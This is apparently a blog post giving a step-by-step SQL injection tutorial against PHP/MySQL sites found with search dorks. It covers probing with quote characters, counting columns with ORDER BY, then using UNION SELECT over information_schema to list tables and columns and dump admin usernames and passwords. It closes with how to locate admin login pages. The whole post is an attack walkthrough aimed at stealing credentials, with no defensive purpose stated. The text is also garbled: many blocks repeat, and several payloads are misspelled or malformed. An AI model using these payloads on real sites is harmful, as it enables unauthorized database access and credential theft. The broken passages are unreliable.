SQL injection is a hacking technique is performed in the client application by modifying an existing command in memory MySQL client applications, this is also a technique in which to exploit web applications using database for data storage.
##########
#Step One#
##########
Here we are looking for can use to get the site dork eg:product.php?id=100
Add the characters "'" at the end of the url or add the character "-" this function is to see whether there is an error message on that site
example:
product.php?id=100'or
product.php?id=100-
Add the characters "'" at the end of the url or add the character "-" this function is to see whether there is an error message on that site
example:
product.php?id=100'or
product.php?id=100-
product.php?id=100;{
product.php?id=100(
product.php?id=100(_!_)
so it appears an error message like the following ::more::
so it appears an error message like the following ::more::
##########
#Step Two#
##########
In this step we will find and count the number of tables that exist in database
For here we use the command: order by
pruduct.php?id=-100+order+by+1-- or
pruduct.php?id=-100+order+by+1/ *
Please check it step by step
eg:
pruduct.php?id=-100+order+by+1--
pruduct.php?id=-100+order+by+2--
pruduct.php?id=-100+order+by+3--
pruduct.php?id=-100+order+by+4--
so there is an error or missing error message ...
produnt.php? id =- 100 + order + by+5- -
means that we take is up to number 4
product.php?id=-100+order+by+4--
For here we use the command: order by
pruduct.php?id=-100+order+by+1-- or
pruduct.php?id=-100+order+by+1/ *
Please check it step by step
eg:
pruduct.php?id=-100+order+by+1--
pruduct.php?id=-100+order+by+2--
pruduct.php?id=-100+order+by+3--
pruduct.php?id=-100+order+by+4--
so there is an error or missing error message ...
produnt.php? id =- 100 + order + by+5- -
means that we take is up to number 4
product.php?id=-100+order+by+4--
############
#Step Three#
############
product.php?id=-100+union+select+1,2,3,4-
ok who is like a figure out of 3
use the command version() or @@version to check the MySQL version reply used, then input the command to figure out who was
product.php? id =- 100 + union + select +1,2,version(),4--
or
product.php?id=-100+union+select+1,2,@@version,4--
If your version of MySQL is version 5 here we use the command
from +information_schema for more berekplorasi again into the site.
###########
#Step Four#
###########
Here we will look for the table so to display the tables that exist on the web page is
command "table_name"
command "from information_schema.tables/*
product.php?id=-100+union+select+1,2,table_name,4+from+ information_schema.tables--
Once we use these commands will display several tables exist in the database of the site, all depending on the site here
because we will be looking for a user of the site then we will see is table that have a relationship with it, such as tbl_user, tbl_admin etc.There are tables admin, so let's exploration in the table.
command "table_name"
command "from information_schema.tables/*
product.php?id=-100+union+select+1,2,table_name,4+from+ information_schema.tables--
Once we use these commands will display several tables exist in the database of the site, all depending on the site here
because we will be looking for a user of the site then we will see is table that have a relationship with it, such as tbl_user, tbl_admin etc.There are tables admin, so let's exploration in the table.
###########
#Step Five#
###########
To display all the contents of the table is
group_concat(table_name)entered in the numbers who went out last
command==> +from+where+information_schema.tables table_schema = database()
inserted after the last digit
product.php?id=-100+union+select+1,2GROUP_CONCAT(table_name),4+from+ information_schema.tables+where+table_schema =database()-
group_concat(table_name)entered in the numbers who went out last
command==> +from+where+information_schema.tables table_schema = database()
inserted after the last digit
product.php?id=-100+union+select+1,2GROUP_CONCAT(table_name),4+from+ information_schema.tables+where+table_schema =database()-
##########
#Step Six#
##########
group_concat(table_name)entered in the numbers who went out last+from+information_schema.columns+where+table_name=0xhexa--
product.php?id=-100+union+select+1,2,group_concat(column_name),4+from+information
_schema .columns+where+table_name=0xhexa--
_schema .columns+where+table_name=0xhexa--
at this stage you must change the words on a hexadecimal table of contents by converting website is used to convert: examples of the word who wanted the conversion is admin then it will be 61646D696E
product.php?id=-100+union+select+1,2,group_concat(column_name),4+from+information
_schema.columns+where+table_name=0x61646D696E--
############
#Step Seven#
############
To bring up what had been excluded from the table that is by concat_ws (0x3a, who want the content column is displayed) = entered the number who went out last. command+from+(the name derived table)=inserted after the last digit
product.php? id =- 100 + union + select+1,2,concat_ws(0x3a, the contents column),4+from(table name is derived) - examples of words that come out are id, username, password
product.php?id=-100+union+select+1,2,concat_ws(0x3a,id,username, password),4+from+admin--
############
#Step Eight#
############
usually
/admin
/admin/login.php
We can also use the tool to look for admin page
0 comments:
Post a Comment